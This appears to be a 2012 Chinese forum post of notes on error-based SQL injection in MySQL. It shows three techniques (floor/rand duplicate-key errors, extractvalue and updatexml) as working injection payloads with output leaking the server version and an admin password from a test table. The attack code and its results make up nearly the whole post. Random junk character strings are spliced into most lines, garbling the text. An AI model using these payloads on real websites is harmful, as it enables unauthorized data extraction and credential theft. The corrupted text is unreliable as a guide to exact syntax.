放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。 Y: w$ `' F+ |- f; r
实际测试环境:
: z5 e! F$ Z; _3 J3 c! i/ {- \* e7 g! W+ J/ j
# r) b5 J9 ^: x0 Imysql> show tables;: M- C \( A$ R4 J0 U9 B
+----------------+. G1 i8 @+ q* _) x& v
| Tables_in_test |/ d/ L! G- h! W% Z* T
+----------------+
0 A: t* P. ]4 f4 T6 i9 B' D| admin |
% l5 V- t) `5 Y| article |7 O% c; p- z: y" m. @2 Z6 x
+----------------+) W% E5 `7 ]% w& \' `
* v+ ?8 i) i8 l* ?/ l! n 7 S1 g P! \3 `6 v& S: D. P$ Y% e" ?
; N; [7 H+ s1 I h/ a X1 C
mysql> describe admin;. c# W* J' B$ r# J: x
+-------+------------------+------+-----+---------+----------------+( r% q) f5 Z6 @) @7 _
| Field | Type | Null | Key | Default | Extra |
/ ^' D' R+ L4 r+-------+------------------+------+-----+---------+----------------+
& Q& V( G9 K* T+ g" a| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. {1 F: o1 d2 s/ @6 U: z: ~| user | varchar(50) | NO | | NULL | |
/ a; H4 T6 T8 P8 V2 ~7 X| pass | varchar(50) | NO | | NULL | |
# e, H0 l! ?2 C. i+-------+------------------+------+-----+---------+----------------+
- m) N% H3 D4 k t/ U; L" O
6 V6 w- t, n$ N+ A. ^: T" C 2 V0 B- g5 W; g
0 z4 v* q1 {! R* L; c7 Amysql> describe article;. l/ f, y' o* P# L; ~7 Q& t$ t$ A+ h
+---------+------------------+------+-----+---------+----------------+
+ }5 C$ Y s( U! |. e. C| Field | Type | Null | Key | Default | Extra |
4 X- d8 Y( J7 w0 C) r" j! q6 w7 M8 t+---------+------------------+------+-----+---------+----------------+
+ u9 d, L4 {- g' L, {1 p. k| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 H+ {3 V, C& t5 Z, w* I, K- k| title | varchar(50) | NO | | NULL | |
- ^' c- F8 H5 T' T| content | varchar(50) | NO | | NULL | |3 N+ g5 d7 {! m* I+ ]
+---------+------------------+------+-----+---------+----------------+
5 g, Y, B- A1 U. V& ~8 k1、通过floor报错( R" k" ?$ T9 V+ ?
可以通过如下一些利用代码; P: d! E5 l* h0 m
; \: |( r8 T; l
) f8 m- g; R. f2 iand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
; e& V: f1 x) l* W9 K/ m8 ?6 tfrom information_schema.tables group by x)a);
4 o# ~2 D. g8 ]0 X / v+ _5 A2 I/ z( R+ A
, i- t5 k0 q+ d; @* u
and (select count(*) from (select 1 union select null union select !1)x% i1 c9 d% o2 t* I& o
group by concat((select table_name from information_schema.tables limit 1),
& w9 g" n: h1 _9 h* dfloor(rand(0)*2)));
5 J8 q- R* \& i b举例如下:& n& J$ P! M6 X4 @
首先进行正常查询:
- l( w T5 g. n1 V) d
5 Y# R ^: m2 `/ f: s7 K/ n- amysql> select * from article where id = 1;
# P A/ U4 }7 x3 F+----+-------+---------+( D L4 ~5 S8 L9 L* c8 o
| id | title | content |/ y/ t; d6 j2 `' X/ t) {
+----+-------+---------+/ k. r9 Y6 B4 i) {
| 1 | test | do it |
+ I8 K& o; I" m3 |, d6 P8 w+----+-------+---------+# A8 O' i4 ]& O8 D2 e2 g! x) ]
假如id输入存在注入的话,可以通过如下语句进行报错。0 s6 Q3 R M" p, {* N2 P
3 g7 a0 K C, Q
2 q$ h, d y0 u# ymysql> select * from article where id = 1 and (select 1 from
; Y$ j2 |: ~8 ^: F, K8 _(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);8 S/ j3 U2 T; n4 h) @. {. G
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'3 V+ |% ?) Y6 a1 `
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 e# a% W) H' X) V$ e5 z
例如我们需要查询管理员用户名和密码:9 y* K/ G# X0 z' K% v* X# S
Method1:0 H( R3 e6 e! w+ h
3 \% k: L8 s( W: v( H. C+ R: d7 X
- c* q, D$ R; K3 a9 z( D% D7 jmysql> select * from article where id = 1 and (select 1 from
/ }9 X) v- x$ y- I2 ^# ~# z(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x+ \5 D( P9 ~' s/ } f& b
from information_schema.tables group by x)a);9 x# z$ x( h. a5 _7 Y" v& p( i2 Z
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
a% b$ \$ u6 W9 @5 q' hMethod2:
* s9 }6 }. v# R) y2 e2 j! s % z+ |$ V* u+ [" Y# Q3 e
; M3 |4 ]: l- }6 H; g* j( F
mysql> select * from article where id = 1 and (select count(*)% Z8 ^# B( S8 s; v
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),% B6 j8 `) T+ C% b: X! y( w( S! H) X
floor(rand(0)*2)));
% O( K' L' t! {ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
. X. l. x; L# h7 c' a* Z2、ExtractValue7 } s# E4 d6 u# p% [* {
测试语句如下
1 Y+ h: V4 A, ^" T
9 p. Y3 P: z- ]5 C5 f # p, `' b+ _4 _2 i+ F
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));& V- t3 a: W. U3 ?' |" W" }4 u
实际测试过程
- ?& Z1 v4 ~$ q1 a1 |
4 p& |# B, G: `; Q/ @+ g' B5 |) C
1 W( H5 Z' ~( Mmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,, |& ?2 R$ J. |4 p; K
(select pass from admin limit 1)));--) C5 [/ e; y6 k/ c; G
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
5 d" d4 c1 Q+ j7 d, n, M5 v& {. F3、UpdateXml# ^8 r: _' q5 L. U' G5 w% g& H0 m
测试语句& V/ {# H! G3 A1 u, G' P7 H
! W3 q( k" ]9 \; o. D/ \2 g
) ^& u- i5 x# ]8 x, Land 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))4 t+ Q, z" E$ x) X1 s2 S' b8 z
实际测试过程! o! u4 {7 K$ [* f, T
) D- t6 N% K2 o& a/ K6 i) ^ : c( t; Z0 v- j* q8 c- _; j
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,9 g: Q0 Y$ |% }2 {1 g8 s6 y$ p
(select pass from admin limit 1),0x5e24),1));
_% u/ p- a6 m1 L7 u* }/ w( kERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'0 p& {9 t" ^# l9 Z6 }. R% P
All, thanks foreign guys.
( B/ c. ~/ g8 M4 ~* x+ O0 c : n5 y9 c# ]2 `
0 ~3 c, `+ z4 T. e
|
发表于 2012-12-10 10:28:51
收藏
支持
反对